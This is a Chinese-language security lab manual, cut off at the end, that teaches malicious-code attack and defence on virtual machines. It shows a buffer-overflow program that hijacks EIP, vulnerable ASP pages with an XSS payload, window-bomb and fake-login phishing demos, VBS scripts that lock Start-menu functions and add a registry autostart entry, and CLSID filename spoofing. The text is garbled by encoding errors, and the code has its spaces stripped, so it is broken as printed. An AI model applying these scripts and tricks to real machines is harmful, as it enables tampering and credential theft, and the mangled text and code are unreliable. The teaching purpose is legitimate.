實(shí)驗(yàn)四 惡意代碼實(shí)驗(yàn)

實(shí)驗(yàn)四惡意代碼攻防實(shí)驗(yàn)【實(shí)驗(yàn)?zāi)康摹客ㄟ^(guò)本實(shí)驗(yàn)初步了解遠(yuǎn)程控制軟件的編寫(xiě)方法，了解黑客利用流行的木馬軟件進(jìn)行遠(yuǎn)程監(jiān)控和攻擊的方法，掌握常見(jiàn)工具的基本應(yīng)用，包括如下幾個(gè)方面：掌握基于Socket的網(wǎng)絡(luò)編程。了解緩沖區(qū)溢出攻擊的基本實(shí)現(xiàn)方法。了解惡意腳本攻擊的基本實(shí)現(xiàn)方法。了解網(wǎng)絡(luò)病毒的基本特性。實(shí)驗(yàn)過(guò)程中，學(xué)生需要將實(shí)驗(yàn)的結(jié)果記錄下來(lái)，并回答相關(guān)思考題，填寫(xiě)到實(shí)驗(yàn)報(bào)告中?！緦?shí)驗(yàn)類型】綜合型實(shí)驗(yàn)【實(shí)驗(yàn)內(nèi)容】以下實(shí)驗(yàn)內(nèi)容可根據(jù)實(shí)驗(yàn)室的具體情況和課時(shí)安排的變化進(jìn)行適當(dāng)?shù)恼{(diào)整，實(shí)驗(yàn)內(nèi)容中的思考題以書(shū)面形式解答并附在實(shí)驗(yàn)報(bào)告的后面。需要注意的是，學(xué)生在實(shí)驗(yàn)過(guò)程中要嚴(yán)格按實(shí)驗(yàn)指導(dǎo)書(shū)的操作步驟和要求操作，且小組成員應(yīng)緊密配合，以保證實(shí)驗(yàn)過(guò)程能夠順利完成。本次實(shí)驗(yàn)的主要項(xiàng)目包括以下幾個(gè)方面：溢出攻擊模擬程序的編寫(xiě)、調(diào)試；跨站惡意腳本的運(yùn)用；網(wǎng)頁(yè)腳本攻擊。具體的實(shí)驗(yàn)內(nèi)容和步驟如下：【實(shí)驗(yàn)環(huán)境】實(shí)驗(yàn)設(shè)備：WindowsXP系統(tǒng)，VMWare系統(tǒng)，Windows2000/XP虛擬機(jī)。一、緩沖區(qū)溢出攻擊編寫(xiě)簡(jiǎn)單的溢出攻擊程序，編譯后分別在實(shí)驗(yàn)主機(jī)和虛擬機(jī)中運(yùn)行。1．簡(jiǎn)單原理示例VC環(huán)境下編譯以下代碼：#include<stdio.h>#include<string.h>charname[]="abcdefghijklmnopqrstuvwxyz";intmain(){charbuffer[8];strcpy(buffer,name);return0;}運(yùn)行編譯后的程序，會(huì)出現(xiàn)系統(tǒng)下圖警告，點(diǎn)擊“調(diào)試”按鈕，根據(jù)返回的偏移值可推斷出溢出的部位。2．溢出攻擊模擬示例實(shí)驗(yàn)需要使用以下工具：OllyDBUedit首先寫(xiě)一個(gè)C++程序2.c，源碼：#include"iostream.h"intmain(){charname[8];cout<<"Pleasetypeyourname:";cin>>name;cout<<"Hello,";cout<<name;cout<<"\n";return0;}賦值一個(gè)名為name的字符類型數(shù)組（字符串），其內(nèi)容空間為8個(gè)字節(jié)，運(yùn)行程序時(shí)首先提示使用者輸入你的名字，當(dāng)輸入后將該值吸入給name，然后以“Hello，你的名字\n”的方式輸出。使用VC的lc編譯該程序（編譯后的程序?yàn)?.exe）后，運(yùn)行…此時(shí)若“你的名字”小于或等于8個(gè)字節(jié)時(shí)程序當(dāng)然能正常運(yùn)行了，但若超過(guò)8個(gè)字節(jié)時(shí)將出現(xiàn)：這次我們要做的實(shí)驗(yàn)就是讓該程序溢出，并能跳轉(zhuǎn)到程序的開(kāi)頭重新運(yùn)行該程序。首先我們運(yùn)行2.exe，當(dāng)程序進(jìn)行至提示用戶輸入字符串時(shí)，輸入一個(gè)特殊定制的字符串“aaabbbcccdddeeefff”，在彈出的對(duì)話框中按“調(diào)試”按鈕（這里我是用OllyDB作為系統(tǒng)的主調(diào)試器的）進(jìn)入OllyDB調(diào)試模式：這里我們發(fā)現(xiàn)負(fù)責(zé)下一跳的EIP寄存器的值被覆蓋了，其值為66656565，對(duì)照ascii表后發(fā)現(xiàn)其值為“feee”，由于寄存器是‘倒轉(zhuǎn)’的，因此其實(shí)是“eeef”覆蓋了EIP，現(xiàn)在我們可以確認(rèn)這個(gè)輸入的字符串中是從第13個(gè)字節(jié)開(kāi)始覆蓋EIP的，共4個(gè)字節(jié)。用OllyDB重新加載2.exe：我們可以看到該程序起始地址為004041B0，根據(jù)字符與地址的對(duì)照關(guān)系是‘倒轉(zhuǎn)’的原理：004041B0等于B0414000此時(shí)打開(kāi)UltraEdit，輸入1，然后按Ctrl+H切換到HEX顯示模式，然后在HEX輸出界面中輸入B0414000：此時(shí)再按Ctrl+H切換回原來(lái)的輸入模式就可以得到相應(yīng)的字符了：按Ctrl+A選中該輸出的字符串，將其放在第12個(gè)字節(jié)之后，如：“aaabbbcccddd癆@”，現(xiàn)在我們重新啟動(dòng)2.exe，在輸入字符串時(shí)輸入該段字符串：如圖，無(wú)論輸入多少次都還是“循環(huán)”，溢出成功。【思考題】溢出攻擊提升權(quán)限是如何實(shí)現(xiàn)的？二、跨站腳本攻擊假設(shè)某站點(diǎn)網(wǎng)站網(wǎng)頁(yè)文件為index.asp，代碼如下：<%@Language=VBScript%><%IfRequest.Cookies("userName")<>""ThenDimstrRedirectUrlstrRedirectUrl="page2.asp?userName="strRedirectUrl=strRedirectUrl&Response.Cookies("userName")Response.Redirect(strRedirectUrl)Else%><HTML><HEAD><TITLE>MyNiceSHomePage</TITLE></HEAD><BODY><H2>MyNiceS</H2><FORMmethod="post"action="page2.asp">EnteryourMyNiceSusername:<INPUTtype="text"name="userName"><INPUTtype="submit"name="submit"value="submit"></FORM></BODY></HTML><%EndIf%>上述代碼執(zhí)行后，調(diào)用page2.asp，回顯輸入的字符。page2.asp代碼如下：<%@Language=VBScript%><%DimstrUserNameIfRequest.QueryString("userName")<>""ThenstrUserName=Request.QueryString("userName")ElseResponse.Cookies("userName")=Request.Form("userName")strUserName=Request.Form("userName")EndIf%><HTML><HEAD></HEAD><BODY><H3align="center">Hello:<%=strUserName%></H3></BODY></HTML>如果，在index.asp中輸入<script>alert('Hello!!!');</script>，點(diǎn)擊提交，觀察運(yùn)行結(jié)果?！舅伎碱}】黑客利用跨站腳本攻擊可以造成哪些危害？三、惡意腳本1．惡意腳本的網(wǎng)頁(yè)，交叉顯示紅色和黑色背景。代碼存為html文件，將網(wǎng)頁(yè)文件放在web目錄下，通過(guò)瀏覽器訪問(wèn)該網(wǎng)頁(yè)。<html><body>Test<script>varcolor=newArray;color[1]="black";//設(shè)置兩種顏色color[2]="red";for(x=2;x<3;x++){document.bgColor=color[x];//設(shè)置背景色if(x==2){x=0;}//造成死循環(huán)}</script><body></html>2．網(wǎng)頁(yè)炸彈，也被稱為窗口轟炸，是一種極其惡劣的針對(duì)客戶端攻擊行為。以下示例可以在附帶的光盤(pán)上找到。這個(gè)示例主要針對(duì)IE瀏覽器，如圖3-93，點(diǎn)擊“網(wǎng)頁(yè)炸彈演示”的鏈接。此時(shí)，需要有一定的心理準(zhǔn)備，因?yàn)轳R上會(huì)出現(xiàn)如圖3-94的場(chǎng)景，而且窗口會(huì)越來(lái)越多。制止的方法只有一個(gè)，按下熱啟動(dòng)組合鍵Ctrl+Alt+Del，進(jìn)入安全對(duì)話框，迅速打開(kāi)任務(wù)管理器并中止“網(wǎng)頁(yè)炸彈.htm”窗口的運(yùn)行。如果動(dòng)手比較慢的話，你的系統(tǒng)極有可能崩潰。那么，網(wǎng)頁(yè)炸彈是如何實(shí)現(xiàn)窗口轟炸的呢？觀察該頁(yè)面的源代碼就可以找到答案了，如圖。在遭受窗口轟炸時(shí)，很容易導(dǎo)致系統(tǒng)崩潰，重新啟動(dòng)系統(tǒng)即可。3．網(wǎng)頁(yè)欺騙在附帶光盤(pán)上有筆者制作的一個(gè)有趣的網(wǎng)頁(yè)欺騙演示，如圖3-88，點(diǎn)擊其中的鏈接。圖3-88網(wǎng)頁(yè)欺騙演示屏幕彈出兩個(gè)窗口，用戶可以看見(jiàn)如圖3-89的提示，粗心的撥號(hào)用戶就可能認(rèn)為真的是線路中斷。然后在圖3-90界面中輸入用戶名和密碼，點(diǎn)擊撥號(hào)。圖3-89虛假的線路中斷提示圖3-90模擬的撥號(hào)連接界面一旦用戶點(diǎn)擊“撥號(hào)”后，我們就可以得到他的用戶帳戶和登錄密碼。當(dāng)然，筆者的演示頁(yè)面中沒(méi)有加任何惡意代碼，可以放心瀏覽。查看第一個(gè)頁(yè)面的源代碼，如圖3-91，讀者可以了解到彈出模擬頁(yè)面的方法。圖3-91主頁(yè)面源代碼查看第二個(gè)頁(yè)面的源代碼，如圖3-92，你可以了解到模擬頁(yè)面是如何畫(huà)出來(lái)的。圖3-92網(wǎng)頁(yè)欺騙的部分源代碼這種欺騙代碼可以通過(guò)嵌入惡意網(wǎng)頁(yè)、郵件和共享文件夾中的.htt文件等方法，等待用戶去觸發(fā)執(zhí)行它。其欺騙行為還可以有其它的方式，如模擬QQ登錄界面、Outlook郵箱登錄界面、訪問(wèn)共享時(shí)彈出的用戶驗(yàn)證窗體等，用戶必須加倍小心。當(dāng)出現(xiàn)這些界面時(shí)，一定要思量一下是否正常。4．改造系統(tǒng)的“開(kāi)始”菜單，禁用查找、運(yùn)行和關(guān)閉功能的腳步程序.ChangeStartMenu.vbs雙擊運(yùn)行即可。如果發(fā)現(xiàn)啟動(dòng)菜單沒(méi)有變化，則重啟系統(tǒng)后可以看到執(zhí)行效果。 SubChange(Argument)ChangeStartMenu.RegWriteRegPath&Argument,Key_Data,Type_NameMsgBox("Success!")EndSubDimChangeStartMenuSetChangeStartMenu=WScript.CreateObject("WScript.Shell")RegPath="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"Type_Name="REG_DWORD"Key_Data=1StartMenu_Run="NoRun"StartMenu_Find="NoFind"StartMenu_Close="NoClose"'CallChange(StartMenu_Run)'禁用“開(kāi)始”菜單中的“運(yùn)行”功能CallChange(StartMenu_Find)'禁用“開(kāi)始”菜單中的“查找”功能'CallChange(StartMenu_Close)'禁用“開(kāi)始”菜單中的“關(guān)閉系統(tǒng)”功能5．向Windows中添加自啟動(dòng)程序，使得該程序能在系統(tǒng)開(kāi)機(jī)時(shí)自動(dòng)運(yùn)行，代碼：auto.vbs，直接運(yùn)行該腳步程序，則系統(tǒng)啟動(dòng)之后會(huì)自動(dòng)運(yùn)行cmd程序。 DimAutoRunProgramSetAutoRunProgram=WScript.CreateObject("WScript.Shell")RegPath="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"Type_Name="REG_SZ"Key_Name="AutoRun"Key_Data="C:\windows\system32\cmd.exe"'該自啟動(dòng)程序的全路徑文件名AutoRunProgram.RegWriteRegPath&Key_Name,Key_Data,Type_Name'在啟動(dòng)組中添加自啟動(dòng)程序autorun.exeMsgBox("Success!")【思考題】惡意腳本構(gòu)成安全威脅的根本原因是什么？6．文件名欺騙我們現(xiàn)在首先創(chuàng)建一個(gè)文本文件，將它的文件名命名為：test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在該文件里面添加如圖內(nèi)容。圖3-83誘餌文件現(xiàn)在，我們通過(guò)資源管理器查看，會(huì)發(fā)現(xiàn)它顯示為test.txt，如圖。這是因?yàn)閧3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注冊(cè)表里是htr文件關(guān)聯(lián)的CLSID（ClassID），用資源管理器和IE瀏覽器查看時(shí)并不會(huì)顯現(xiàn)出來(lái)，你看到的就是個(gè).txt文件。當(dāng)你誤認(rèn)為是一個(gè).txt文件，而雙擊打開(kāi)它時(shí)，就會(huì)被執(zhí)行，如圖。在我們的這個(gè)例子中只是啟動(dòng)了一個(gè)命令行命令Ping，并沒(méi)有什么危害性，如果運(yùn)行的是格式化、刪除文件等破壞性命令，后果就不堪設(shè)想了。其實(shí)這個(gè)文件在命令行窗口下是可以看見(jiàn)的，如下圖。這種欺騙的方法，還可以用在郵件的附件中，比如將一個(gè)惡意的VBS腳本裝成文本文件、圖片等，再起個(gè)吸引人的名字，引誘用戶去點(diǎn)擊。這樣就可以直接對(duì)用戶進(jìn)行攻擊，如刪除文件、格式化磁盤(pán)、安裝木馬文件、傳播病毒等。那么，針對(duì)這種欺騙如何識(shí)別和防范呢？細(xì)心一點(diǎn)可以發(fā)現(xiàn)，在資源管理器（文件查看方式默認(rèn)為“按WEB頁(yè)方式”查看）中這種帶有欺騙性質(zhì)的.txt文件顯示出來(lái)的并不是文本文件的圖標(biāo)，它顯示的是未定